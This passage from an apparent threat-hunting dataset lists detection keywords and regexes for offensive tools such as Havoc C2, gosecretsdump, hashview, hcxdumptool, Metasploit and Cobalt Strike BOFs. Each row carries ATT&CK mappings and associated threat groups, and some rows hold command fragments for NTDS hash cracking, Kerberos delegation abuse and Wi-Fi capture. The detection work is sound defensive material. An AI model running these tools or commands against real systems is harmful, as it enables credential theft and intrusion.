with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","47023" "*hashedBootKey CheckSum failed, Syskey startup password probably in use! :(*",".{0,1000}hashedBootKey\sCheckSum\sfailed,\sSyskey\sstartup\spassword\sprobably\sin\suse!\s\:\(.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","47024" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","47025" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/hasherezade/exe_to_dll","1","1","N/A","N/A","8","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","47026" 
"*hasherezade/persistence_demos*",".{0,1000}hasherezade\/persistence_demos.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","47027" "*-hashes* --escalate-user*",".{0,1000}\-hashes.{0,1000}\s\-\-escalate\-user.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","47028" "*hashonymize --ntds * --kerberoast *",".{0,1000}hashonymize\s\-\-ntds\s.{0,1000}\s\-\-kerberoast\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47029" "*HashPals/Name-That-Hash*",".{0,1000}HashPals\/Name\-That\-Hash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47030" "*--hash-type 1000 --potfile-path*.ntds.cracked*",".{0,1000}\-\-hash\-type\s1000\s\-\-potfile\-path.{0,1000}\.ntds\.cracked.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47031" "*hashview*@*localhost*",".{0,1000}hashview.{0,1000}\@.{0,1000}localhost.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47032" "*hashview/config.conf*",".{0,1000}hashview\/config\.conf.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47033" "*hashview/hashview*",".{0,1000}hashview\/hashview.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47034" "*hashview-agent.*.tgz*",".{0,1000}hashview\-agent\..{0,1000}\.tgz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47035" "*hashview-agent.py*",".{0,1000}hashview\-agent\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","47036" "*HasSPNNoPreauth*",".{0,1000}HasSPNNoPreauth.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","47037" "*hatlord/snmpwn*",".{0,1000}hatlord\/snmpwn.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","47038" "*hausec/ADAPE-Script*",".{0,1000}hausec\/ADAPE\-Script.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","47039" "*hausec/ProxyLogon*",".{0,1000}hausec\/ProxyLogon.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation 
tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","47040" "*havoc client*",".{0,1000}havoc\sclient.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47041" "*havoc server*",".{0,1000}havoc\sserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47042" "*havoc.agent*",".{0,1000}havoc\.agent.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47043" "*Havoc.git*",".{0,1000}Havoc\.git.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 
T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47044" "*Havoc.hpp*",".{0,1000}Havoc\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47045" "*havoc.service*",".{0,1000}havoc\.service.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47046" "*havoc.yaotl*",".{0,1000}havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47047" "*Havoc/Client*",".{0,1000}Havoc\/Client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 
- T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47048" "*Havoc/cmd/*",".{0,1000}Havoc\/cmd\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47049" "*Havoc/payloads*",".{0,1000}Havoc\/payloads.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47050" "*Havoc/pkg*",".{0,1000}Havoc\/pkg.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47051" "*Havoc/Teamserver*",".{0,1000}Havoc\/Teamserver.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47052" "*havoc_agent.py*",".{0,1000}havoc_agent\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47053" "*havoc_agent_talon.*",".{0,1000}havoc_agent_talon\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47054" "*havoc_default.yaotl*",".{0,1000}havoc_default\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47055" "*havoc_externalc2*",".{0,1000}havoc_externalc2.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and 
malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47056" "*havoc_service_connect*",".{0,1000}havoc_service_connect.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47057" "*havoc-c2-client*",".{0,1000}havoc\-c2\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47058" "*havoc-c2-data*",".{0,1000}havoc\-c2\-data.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47059" 
"*havocframework.com*",".{0,1000}havocframework\.com.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47060" "*HavocService*",".{0,1000}HavocService.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47061" "*HavocTalonInteract*",".{0,1000}HavocTalonInteract.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47062" "*Havoc-UACBypass.py*",".{0,1000}Havoc\-UACBypass\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","47063" 
"*HavocUi.cpp*",".{0,1000}HavocUi\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47064" "*HavocUi.h*",".{0,1000}HavocUi\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47065" "*HavocUI.hpp*",".{0,1000}HavocUI\.hpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47066" "*hccapx2john.py*",".{0,1000}hccapx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47067" 
"*hci_oracle_passwords*",".{0,1000}hci_oracle_passwords.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47068" "*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*",".{0,1000}hcxdumptool\s\-i\swlan1\s\-o\s.{0,1000}\s\-\-active_beacon\s\-\-enable_status\=1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47069" "*hcxdumptool*",".{0,1000}hcxdumptool.{0,1000}","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. 
After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","N/A","10","1949","407","2025-04-19T07:25:39Z","2018-02-25T08:18:40Z","47070" "*hcxhashtool -i *.hashcat --info stdout*",".{0,1000}hcxhashtool\s\-i\s.{0,1000}\.hashcat\s\-\-info\sstdout.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47071" "*hcxpcapngtool --all -o *.hashcat*",".{0,1000}hcxpcapngtool\s\-\-all\s\-o\s.{0,1000}\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47072" "*hcxpcapngtool -o *.hashcat *.pcapng*",".{0,1000}hcxpcapngtool\s\-o\s.{0,1000}\.hashcat\s.{0,1000}\.pcapng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47073" "*hd-launch-cmd *",".{0,1000}hd\-launch\-cmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47074" "*headers/exploit.h*",".{0,1000}headers\/exploit\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","47075" "*headers/HandleKatz.h*",".{0,1000}headers\/HandleKatz\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 